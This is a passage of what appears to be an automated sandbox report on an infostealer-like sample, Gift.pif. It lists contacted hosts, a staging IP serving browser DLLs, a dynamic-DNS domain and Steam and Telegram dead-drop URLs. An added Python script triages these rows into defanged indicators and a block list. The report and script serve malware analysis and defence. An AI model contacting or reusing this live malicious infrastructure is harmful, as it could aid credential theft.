https://store.steampowered.com/steam_refunds/ | 0% | Avira URL Cloud | safe
https://store.steampowered.com/legal/ | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl | 0% | Avira URL Cloud | safe
http://arpdabl.zapto.orgE | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=GG0UCGgA | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199747278259E | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw | 0% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.249 | true | false | - | unknown
arpdabl.zapto.org | 38.180.132.96 | true | false | - | unknown
KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqy | unknown | unknown | false | - | unknown
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://188.245.87.202/msvcp140.dll | false | Avira URL Cloud: safe | unknown
https://188.245.87.202/ | false | Avira URL Cloud: safe | unknown
https://188.245.87.202/softokn3.dll | false | Avira URL Cloud: safe | unknown
https://188.245.87.202/vcruntime140.dll | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/76561199747278259 | false | Avira URL Cloud: malware | unknown
https://188.245.87.202/mozglue.dll | false | Avira URL Cloud: safe | unknown
https://188.245.87.202/nss3.dll | false | Avira URL Cloud: safe | unknown
https://188.245.87.202/freebl3.dll | false | Avira URL Cloud: safe | unknown
https://188.245.87.202/sqls.dll | false | Avira URL Cloud: safe | unknown
http://arpdabl.zapto.org/ | false | Avira URL Cloud: safe | unknown
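Read the URL tables above with the rest of the report in hand rather than by their verdict column: every https://188.245.87.202/*.dll entry is rated "safe" by Avira URL Cloud, yet 188.245.87.202 is the IP Gift.pif talked to on 443 and the file names are exactly the NSS and VC runtime DLLs it wrote to C:\ProgramData, while arpdabl.zapto.org is a free dynamic-DNS name. The following triage script is an added example for this page, not Joe Sandbox code, and it is not part of the report: it correlates the URL rows with the contacted hosts and the dropped-file list so that "safe"-rated staging URLs are still extracted as indicators, and it keeps shared services (steamcommunity.com, t.me) as URL-level indicators only rather than blockable hosts. The rows are copied from the tables on this page; the dynamic-DNS suffix list is a short illustrative set I supplied, not something the report contains.

```python
import ipaddress
from urllib.parse import urlsplit

# Hosts the sample resolved or connected to during the run (report network section).
CONTACTED = {"188.245.87.202", "arpdabl.zapto.org", "steamcommunity.com"}
# Files Gift.pif wrote to C:\ProgramData (report dropped-files table).
DROPPED = {"freebl3.dll", "mozglue.dll", "msvcp140.dll", "nss3.dll",
           "softokn3.dll", "vcruntime140.dll"}
# Free dynamic-DNS suffixes: a short illustrative list, not from the report.
DYNDNS = ("zapto.org", "no-ip.org", "ddns.net", "hopto.org", "duckdns.org")

# (url, detection %, scanner, verdict) rows copied from the report's URL table,
# including CDN and browser-profile URLs that are noise.
URL_ROWS = [
    ("https://188.245.87.202/nss3.dll", 0, "Avira URL Cloud", "safe"),
    ("https://188.245.87.202/softokn3.dll", 0, "Avira URL Cloud", "safe"),
    ("https://188.245.87.202/freebl3.dll", 0, "Avira URL Cloud", "safe"),
    ("https://188.245.87.202/mozglue.dll", 0, "Avira URL Cloud", "safe"),
    ("https://188.245.87.202/msvcp140.dll", 0, "Avira URL Cloud", "safe"),
    ("https://188.245.87.202/vcruntime140.dll", 0, "Avira URL Cloud", "safe"),
    ("https://188.245.87.202/sqls.dll", 0, "Avira URL Cloud", "safe"),
    ("https://steamcommunity.com/profiles/76561199747278259", 100, "Avira URL Cloud", "malware"),
    ("https://t.me/armad2a", 100, "Avira URL Cloud", "malware"),
    ("http://arpdabl.zapto.org/", 0, "Avira URL Cloud", "safe"),
    ("https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english", 0, "Avira URL Cloud", "safe"),
    ("https://duckduckgo.com/ac/?q=", 0, "Avira URL Cloud", "safe"),
    ("http://www.sqlite.org/copyright.html.", 0, "URL Reputation", "safe"),
    ("https://www.autoitscript.com/autoit3/", 0, "Avira URL Cloud", "safe"),
]


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _is_dyndns(host):
    return any(host == s or host.endswith("." + s) for s in DYNDNS)


def reasons_for(url, pct, scanner, verdict):
    """Why this URL is an indicator; an empty list means it is noise."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    leaf = parts.path.rsplit("/", 1)[-1].lower()
    reasons = []
    if verdict != "safe":
        reasons.append(f"{scanner} verdict {verdict} ({pct}%)")
    if host in CONTACTED:
        reasons.append("host contacted during the run")
    if _is_ip(host):
        reasons.append("raw IP literal")
    if _is_dyndns(host):
        reasons.append("dynamic-DNS host")
    if leaf in DROPPED:
        reasons.append(f"path names dropped file {leaf}")
    return reasons


def defang(url):
    """hxxp scheme and [.] in the host, so the indicator cannot be clicked."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    scheme = parts.scheme.replace("http", "hxxp")
    out = url.replace(parts.scheme + "://", scheme + "://", 1)
    return out.replace(host, host.replace(".", "[.]"), 1)


def triage(rows):
    """Split rows into indicators and noise, and list the hosts worth blocking
    outright (IP literals and dynamic-DNS names; shared services such as
    steamcommunity.com or t.me stay URL-level indicators only)."""
    iocs, noise = [], []
    for url, pct, scanner, verdict in rows:
        host = (urlsplit(url).hostname or "").lower()
        r = reasons_for(url, pct, scanner, verdict)
        (iocs if r else noise).append({"url": url, "host": host, "reasons": r})
    block = sorted({i["host"] for i in iocs if _is_ip(i["host"]) or _is_dyndns(i["host"])})
    return {"iocs": iocs, "noise": noise, "block_hosts": block}


if __name__ == "__main__":
    result = triage(URL_ROWS)
    for i in result["iocs"]:
        print(defang(i["url"]), "<-", "; ".join(i["reasons"]))
    print("block:", ", ".join(result["block_hosts"]))
    print("noise:", len(result["noise"]), "urls")
```

Run on the rows above it keeps all seven staging URLs on 188.245.87.202 (each with at least two independent reasons), the Steam profile and Telegram URLs, and the dynamic-DNS host, and discards the Steam CDN, DuckDuckGo, SQLite and AutoIt strings as noise; only the IP literal and the dynamic-DNS name end up on the block list.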
URLs from memory and dropped files:
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=zGRpBs82SFHJ&a | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | DHCBGD.11.dr | false | Avira URL Cloud: safe | unknown
https://store.steampowered.c | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=Dbzy | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | DHCBGD.11.dr | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/?subsection=broadcasts | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false | Avira URL Cloud: safe | unknown
http://arpdabl.zapto.org/TH | Gift.pif, 0000000B.00000002.3226364575.00000000128B1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.dr | false | URL Reputation: safe | unknown
https://store.steampowered.com/subscriber_agreement/ | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false | Avira URL Cloud: safe | unknown
http://arpdabl.FCBFIEGCAE | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.245.87.202/vcruntime140.dll1J | Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.dr | false | Avira URL Cloud: safe | unknown
http://arpdabl.zapto.GCAE | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.valvesoftware.com/legal.htm | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | false
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://steamcommunity.com/profiles/76561199747278259/badgesGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=enGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://188.245.87.202KJDGift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.autoitscript.com/autoit3/Jlem.exe, 00000000.00000003.2031229309.000000000293B000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000000.2069414252.0000000000399000.00000002.00000001.01000000.00000006.sdmp, Gift.pif.2.dr, Automobile.0.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.mozilla.com/en-US/blocklist/Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.drfalse
                              • URL Reputation: safe
                              unknown
                              http://arpdabl.zaptoEGCAEGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://mozilla.org0/Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://t.me/armad2aGift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://store.steampowered.com/privacy_agreement/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://store.steampowered.com/points/shop/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DHCBGD.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://nsis.sf.net/NSIS_ErrorErrorlem.exefalse
                              • URL Reputation: safe
                              unknown
                              https://www.ecosia.org/newtab/DHCBGD.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brFBAAAK.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://store.steampowered.com/privacy_agreement/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLFBAAAK.11.drfalse
                              • URL Reputation: safe
                              unknown
                              http://arpdabl.zapto.orgGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refGift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://store.steampowered.com/about/76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://steamcommunity.com/my/wishlist/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://t.me/armad2ahellosqls.dllsqlite3.dllInGift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://188.245.87.202/V;Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://help.steampowered.com/en/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://steamcommunity.com/market/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://store.steampowered.com/news/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiAFHDGD.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=Q4LAS9-JZwft&amp;l=eGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DHCBGD.11.drfalse
                              • URL Reputation: safe
                              unknown
                              http://store.steampowered.com/subscriber_agreement/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://steamcommunity.com/profiles/76561199747278259/inventory/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://188.245.87.202/nss3.dllGGift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://arpdabl.zaptoGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://188.245.87.202/_;Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://188.245.87.20276561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://steamcommunity.com/discussions/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
